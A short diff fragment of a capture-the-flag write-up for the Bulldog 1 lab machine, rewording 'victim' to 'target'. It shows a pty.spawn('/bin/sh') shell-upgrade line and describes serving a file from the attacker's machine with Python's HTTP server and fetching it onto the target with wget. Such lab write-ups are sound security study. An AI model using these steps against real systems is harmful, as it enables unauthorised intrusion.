jno3/jno3.github.io/writeups/bulldog-1.md

 pty.spawn("/bin/sh")
 ```

-And serve it on through python's simpleHTTPserver and download it through wget on the victim machine, so, on my local machine:
+And serve it on through python's simpleHTTPserver and download it through wget on the target machine, so, on my local machine:

 ```bash
 ┌──(j㉿kali)-[~/Desktop/TOOLS]